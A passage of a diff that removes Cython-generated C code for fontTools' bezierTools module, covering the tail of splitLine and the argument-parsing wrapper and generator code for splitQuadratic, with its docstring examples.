__PYX_ERR(0, 487, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_pt2x = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_pt2y = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":489 - * pt2x, pt2y = pt2 - * - * ax = pt2x - pt1x # <<<<<<<<<<<<<< - * ay = pt2y - pt1y - * - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_pt2x, __pyx_v_pt1x); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 489, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_ax = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":490 - * - * ax = pt2x - pt1x - * ay = pt2y - pt1y # <<<<<<<<<<<<<< - * - * bx = pt1x - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_pt2y, __pyx_v_pt1y); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 490, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_ay = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":492 - * ay = pt2y - pt1y - * - * bx = pt1x # <<<<<<<<<<<<<< - * by = pt1y - * - */ - __Pyx_INCREF(__pyx_v_pt1x); - __pyx_v_bx = __pyx_v_pt1x; - - /* "fontTools/misc/bezierTools.py":493 - * - * bx = pt1x - * by = pt1y # <<<<<<<<<<<<<< - * - * a = (ax, ay)[isHorizontal] - */ - __Pyx_INCREF(__pyx_v_pt1y); - __pyx_v_by = __pyx_v_pt1y; - - /* "fontTools/misc/bezierTools.py":495 - * by = pt1y - * - * a = (ax, ay)[isHorizontal] # <<<<<<<<<<<<<< - * - * if a == 0: - */ - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 495, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_ax); - __Pyx_GIVEREF(__pyx_v_ax); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_ax)) __PYX_ERR(0, 495, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_ay); - __Pyx_GIVEREF(__pyx_v_ay); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_ay)) __PYX_ERR(0, 495, __pyx_L1_error); - __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_t_1, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 495, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_a = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":497 - * a = (ax, ay)[isHorizontal] - * - * if a == 0: # <<<<<<<<<<<<<< - * return [(pt1, pt2)] - * t = (where - (bx, by)[isHorizontal]) / a - */ - __pyx_t_5 = (__Pyx_PyInt_BoolEqObjC(__pyx_v_a, __pyx_int_0, 0, 0)); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 497, __pyx_L1_error) - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":498 - * - * if a == 0: - * return [(pt1, pt2)] # <<<<<<<<<<<<<< - * t = (where - (bx, by)[isHorizontal]) / a - * if 0 <= t < 1: - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 498, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_pt1)) __PYX_ERR(0, 498, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_pt2)) __PYX_ERR(0, 498, __pyx_L1_error); - __pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 498, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_1, 0, __pyx_t_2)) __PYX_ERR(0, 498, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":497 - * a = (ax, ay)[isHorizontal] - * - * if a == 0: # <<<<<<<<<<<<<< - * return [(pt1, pt2)] - * t = (where - (bx, by)[isHorizontal]) / a - */ - } - - /* "fontTools/misc/bezierTools.py":499 - * if a == 0: - * return [(pt1, pt2)] - * t = (where - (bx, by)[isHorizontal]) / a # <<<<<<<<<<<<<< - * if 0 <= t < 1: - * midPt = ax * t + bx, ay * t + by - */ - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 499, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_bx); - __Pyx_GIVEREF(__pyx_v_bx); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_bx)) __PYX_ERR(0, 499, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_by); - __Pyx_GIVEREF(__pyx_v_by); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_by)) __PYX_ERR(0, 499, __pyx_L1_error); - __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_t_1, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 499, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_v_where, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 499, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyNumber_Divide(__pyx_t_1, __pyx_v_a); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 499, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_t = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":500 - * return [(pt1, pt2)] - * t = (where - (bx, by)[isHorizontal]) / a - * if 0 <= t < 1: # <<<<<<<<<<<<<< - * midPt = ax * t + bx, ay * t + by - * return [(pt1, midPt), (midPt, pt2)] - */ - __pyx_t_2 = PyObject_RichCompare(__pyx_int_0, __pyx_v_t, Py_LE); __Pyx_XGOTREF(__pyx_t_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 500, __pyx_L1_error) - if (__Pyx_PyObject_IsTrue(__pyx_t_2)) { - __Pyx_DECREF(__pyx_t_2); - __pyx_t_2 = PyObject_RichCompare(__pyx_v_t, __pyx_int_1, Py_LT); __Pyx_XGOTREF(__pyx_t_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 500, __pyx_L1_error) - } - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_2); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 500, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":501 - * t = (where - (bx, by)[isHorizontal]) / a - * if 0 <= t < 1: - * midPt = ax * t + bx, ay * t + by # <<<<<<<<<<<<<< - * return [(pt1, midPt), (midPt, pt2)] - * else: - */ - __pyx_t_2 = PyNumber_Multiply(__pyx_v_ax, __pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 501, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_bx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 501, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_v_ay, __pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 501, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Add(__pyx_t_2, __pyx_v_by); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 501, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 501, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_t_1)) __PYX_ERR(0, 501, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_t_3)) __PYX_ERR(0, 501, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_3 = 0; - __pyx_v_midPt = ((PyObject*)__pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":502 - * if 0 <= t < 1: - * midPt = ax * t + bx, ay * t + by - * return [(pt1, midPt), (midPt, pt2)] # <<<<<<<<<<<<<< - * else: - * return [(pt1, pt2)] - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 502, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_pt1)) __PYX_ERR(0, 502, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_midPt); - __Pyx_GIVEREF(__pyx_v_midPt); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_midPt)) __PYX_ERR(0, 502, __pyx_L1_error); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 502, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_midPt); - __Pyx_GIVEREF(__pyx_v_midPt); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_midPt)) __PYX_ERR(0, 502, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_v_pt2)) __PYX_ERR(0, 502, __pyx_L1_error); - __pyx_t_1 = PyList_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 502, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_1, 0, __pyx_t_2)) __PYX_ERR(0, 502, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyList_SET_ITEM(__pyx_t_1, 1, __pyx_t_3)) __PYX_ERR(0, 502, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_3 = 0; - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":500 - * return [(pt1, pt2)] - * t = (where - (bx, by)[isHorizontal]) / a - * if 0 <= t < 1: # <<<<<<<<<<<<<< - * midPt = ax * t + bx, ay * t + by - * return [(pt1, midPt), (midPt, pt2)] - */ - } - - /* "fontTools/misc/bezierTools.py":504 - * return [(pt1, midPt), (midPt, pt2)] - * else: - * return [(pt1, pt2)] # <<<<<<<<<<<<<< - * - * - */ - /*else*/ { - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 504, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_pt1)) __PYX_ERR(0, 504, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_pt2)) __PYX_ERR(0, 504, __pyx_L1_error); - __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 504, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_3, 0, __pyx_t_1)) __PYX_ERR(0, 504, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - } - - /* "fontTools/misc/bezierTools.py":450 - * - * - * def splitLine(pt1, pt2, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a line at a given coordinate. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitLine", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_pt1x); - __Pyx_XDECREF(__pyx_v_pt1y); - __Pyx_XDECREF(__pyx_v_pt2x); - __Pyx_XDECREF(__pyx_v_pt2y); - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_a); - __Pyx_XDECREF(__pyx_v_t); - __Pyx_XDECREF(__pyx_v_midPt); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":507 - * - * - * def splitQuadratic(pt1, pt2, pt3, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at a given coordinate. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_27splitQuadratic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_26splitQuadratic, "splitQuadratic(pt1, pt2, pt3, where, isHorizontal)\nSplit a quadratic Bezier curve at a given coordinate.\n\n Args:\n pt1,pt2,pt3: Control points of the Bezier as 2D tuples.\n where: Position at which to split the curve.\n isHorizontal: Direction of the ray splitting the curve. If true,\n ``where`` is interpreted as a Y coordinate; if false, then\n ``where`` is interpreted as an X coordinate.\n\n Returns:\n A list of two curve segments (each curve segment being three 2D tuples)\n if the curve was successfully split, or a list containing the original\n curve.\n\n Example::\n\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 150, False))\n ((0, 0), (50, 100), (100, 0))\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 50, False))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (75, 50), (100, 0))\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 25, False))\n ((0, 0), (12.5, 25), (25, 37.5))\n ((25, 37.5), (62.5, 75), (100, 0))\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 25, True))\n ((0, 0), (7.32233, 14.6447), (14.6447, 25))\n ((14.6447, 25), (50, 75), (85.3553, 25))\n ((85.3553, 25), (92.6777, 14.6447), (100, -7.10543e-15))\n >>> # XXX I'm not at all sure if the following behavior is desirable:\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 50, True))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (50, 50), (50, 50))\n ((50, 50), (75, 50), (100, 0))\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_27splitQuadratic = {"splitQuadratic", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_27splitQuadratic, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_26splitQuadratic}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_27splitQuadratic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_where = 0; - PyObject *__pyx_v_isHorizontal = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitQuadratic (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_where,&__pyx_n_s_isHorizontal,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 507, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 507, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitQuadratic", 1, 5, 5, 1); __PYX_ERR(0, 507, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 507, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitQuadratic", 1, 5, 5, 2); __PYX_ERR(0, 507, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_where)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 507, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitQuadratic", 1, 5, 5, 3); __PYX_ERR(0, 507, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_isHorizontal)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[4]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 507, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitQuadratic", 1, 5, 5, 4); __PYX_ERR(0, 507, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "splitQuadratic") < 0)) __PYX_ERR(0, 507, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 5)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_where = values[3]; - __pyx_v_isHorizontal = values[4]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("splitQuadratic", 1, 5, 5, __pyx_nargs); __PYX_ERR(0, 507, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitQuadratic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_26splitQuadratic(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_where, __pyx_v_isHorizontal); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_14splitQuadratic_2generator2(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value); /* proto */ - -/* "fontTools/misc/bezierTools.py":546 - * a[isHorizontal], b[isHorizontal], c[isHorizontal] - where - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) # <<<<<<<<<<<<<< - * if not solutions: - * return [(pt1, pt2, pt3)] - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_14splitQuadratic_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *__pyx_cur_scope; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("genexpr", 0); - __pyx_cur_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr, __pyx_empty_tuple, NULL); - if (unlikely(!__pyx_cur_scope)) { - __pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *)Py_None); - __Pyx_INCREF(Py_None); - __PYX_ERR(0, 546, __pyx_L1_error) - } else { - __Pyx_GOTREF((PyObject *)__pyx_cur_scope); - } - __pyx_cur_scope->__pyx_genexpr_arg_0 = __pyx_genexpr_arg_0; - __Pyx_INCREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - { - __pyx_CoroutineObject *gen = __Pyx_Generator_New((__pyx_coroutine_body_t) __pyx_gb_9fontTools_4misc_11bezierTools_14splitQuadratic_2generator2, NULL, (PyObject *) __pyx_cur_scope, __pyx_n_s_genexpr, __pyx_n_s_splitQuadratic_locals_genexpr, __pyx_n_s_fontTools_misc_bezierTools); if (unlikely(!gen)) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_DECREF(__pyx_cur_scope); - __Pyx_RefNannyFinishContext(); - return (PyObject *) gen; - } - - /* function exit code */ - __pyx_L1_error:; - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitQuadratic.genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __Pyx_DECREF((PyObject *)__pyx_cur_scope); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_14splitQuadratic_2generator2(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value) /* generator body */ -{ - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *__pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *)__pyx_generator->closure); - PyObject *__pyx_r = NULL; - PyObject *__pyx_t_1 = NULL; - Py_ssize_t __pyx_t_2; - PyObject *(*__pyx_t_3)(PyObject *); - PyObject *__pyx_t_4 = NULL; - int __pyx_t_5; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("genexpr", 0); - switch (__pyx_generator->resume_label) { - case 0: goto __pyx_L3_first_run; - default: /* CPython raises the right error here */ - __Pyx_RefNannyFinishContext(); - return NULL; - } - __pyx_L3_first_run:; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 546, __pyx_L1_error) - __pyx_r = PyList_New(0); if (unlikely(!__pyx_r)) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_GOTREF(__pyx_r); - if (unlikely(!__pyx_cur_scope->__pyx_genexpr_arg_0)) { __Pyx_RaiseUnboundLocalError(".0"); __PYX_ERR(0, 546, __pyx_L1_error) } - if (likely(PyList_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) || PyTuple_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) { - __pyx_t_1 = __pyx_cur_scope->__pyx_genexpr_arg_0; __Pyx_INCREF(__pyx_t_1); - __pyx_t_2 = 0; - __pyx_t_3 = NULL; - } else { - __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_cur_scope->__pyx_genexpr_arg_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 546, __pyx_L1_error) - } - for (;;) { - if (likely(!__pyx_t_3)) { - if (likely(PyList_CheckExact(__pyx_t_1))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 546, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 546, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) 